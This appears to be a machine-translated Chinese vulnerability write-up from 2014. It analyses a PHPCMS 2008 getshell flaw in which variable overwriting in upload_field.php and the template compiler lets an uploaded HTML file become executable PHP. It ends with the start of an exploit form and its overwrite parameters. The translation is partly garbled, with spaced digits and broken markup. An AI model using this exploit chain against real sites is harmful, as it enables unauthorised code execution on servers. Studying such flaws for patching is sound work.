phpcms foreground and(background permissions)getshell1-vulnerability warning-the black bar safety net

2014-01-30T00:00:00
ID MYHACK58:62201442046
Type myhack58
Reporter 佚名
Modified 2014-01-30T00:00:00

Description

1, The first first reception of it, to estimate a lot of stations are starting to fill up. For phpcms 2 0 0 8, the secondary attack category, a secondary analysis getshell it.

In upload_field. php

<br />

$upload_allowext = ! empty($C['upload_allowext']) ? $C['upload_allowext'] : $info['upload_allowext'];</p>

<p> // vulnerability trigger point through the variable cover$upload_allowext this variable is assigned the value of the html</p>

<p>$upload_maxsize = ! empty($C['upload_maxsize']) ? $C['upload_maxsize'] : $info['upload_maxsize']*1 0 2 4;</p>

<p>$isthumb = isset($C['thumb_enable']) ? $C['thumb_enable'] : ($PHPCMS['thumb_enable'] && $info['isthumb'] ? 1 : 0);</p>

<p>$iswatermark = isset($C['watermark_enable']) ? $C['watermark_enable'] : ($PHPCMS['watermark_enable'] && $info['iswatermark'] ? 1 : 0);</p>

<p>$thumb_width = isset($width) ? $width : (isset($C['thumb_width']) ? $C['thumb_width'] : ($info['thumb_width'] ? $info['thumb_width'] : $PHPCMS['thumb_width']));</p>

<p>$thumb_height = isset($height) ? $height : (isset($C['thumb_height']) ? $C['thumb_height'] : ($info['thumb_height'] ? $info['thumb_height'] : $PHPCMS['thumb_height']));</p>

<p>$watermark_img = PHPCMS_ROOT. ($info['watermark_img'] ? $info['watermark_img'] : $PHPCMS['watermark_img']);</p>

<p>$attachment = new attachment($mod); //instantiate the attachment upload class</p>

<p>if($dosubmit)</p>

<p>{</p>

<p> $attachment->upload($uploadtext, $upload_allowext, $upload_maxsize, 1);</p>

<p> // vulnerability trigger point reference attachment upload class<br />

Here we can use? C[upload_allowext]=html&C[upload_maxsize]=1 0 2 4 0 0 0 in such a way to cover the Transmission Type, to achieve the upload we use the malicious script, but can not directly upload the php and the like, you can keep track of this attachment class file. But we can upload html

In the preview the. php 6 0 at line

<br />

$head['description'] = $r['description'];</p>

<p>if(!$ template) $template = $C[‘template_show’]; // by variable coverage to cover the$template variable</p>

<p>include template(‘phpcms’, $template); // calls the template template analytic functions</p>

<p>// parse the template method</p>

<p>function template($module = 'phpcms', $template = 'index', $istag = 0)</p>

<p>{</p>

<p> $compiledtplfile = TPL_CACHEPATH.$ module.'_'.$ template.'. tpl.php';</p>

<p> if(TPL_REFRESH && (! file_exists($compiledtplfile) || @filemtime(TPL_ROOT. TPL_NAME.'/'.$ module.'/'.$ template.'. html') > @filemtime($compiledtplfile) || @filemtime(TPL_ROOT. TPL_NAME.'/ tag.inc.php') > @filemtime($compiledtplfile)))</p>

<p> {</p>

<p> require_once PHPCMS_ROOT.'include/template.func.php';</p>

<p> template_compile($module, $template, $istag); // template parsing</p>

<p> }</p>

<p> return $compiledtplfile;</p>

<p>}</p>

<p> // keep track template_compile function<br />

In the template. func. php 2 line at

<br />

function template_compile($module, $template, $istag = 0)</p>

<p>{</p>

<p> $tplfile = TPL_ROOT. TPL_NAME.‘/’.$ module.‘/’.$ template.‘. html’; // here$template controlled</p>

<p> $content = @file_get_contents($tplfile); // trigger the vulnerability, an analysis of the constructed malicious file</p>

<p> if($content === false) showmessage("$tplfile is not exists!");& lt;/p>

<p> $compiledtplfile = TPL_CACHEPATH.$ module.'_'.$ template.'. tpl.php';</p>

<p> $content = ($istag || substr($template, 0, 4) == 'tag_') ? '<? php function tag'.$ module.'_'.$ template.' ($data, $number, $rows, $count, $page, $pages, $setting){ global $PHPCMS,$MODULE,$M,$CATEGORY,$TYPE,$AREA,$GROUP,$MODEL,$templateid,$_userid,$_username;@extract($setting);?& gt;'. template_parse($content, 1).'& lt;? php } ?& gt;' : template_parse($content);</p>

<p> $strlen = file_put_contents($compiledtplfile, $content);</p>

<p> @chmod($compiledtplfile, 0 7 7 7);</p>

<p> return $strlen;</p>

<p>}<br />

This is the analysis of the local

The final is given the exp is as follows

</p>

<form action="http://xxx.com/upload_field.php?C[upload_allowext]=html&C[upload_maxsize]=1 0 2 4 0 0 0&uinfo=1" method="post" enctype="multipart/form-data"><!-- Modify the URL--></p>

[1] [2] next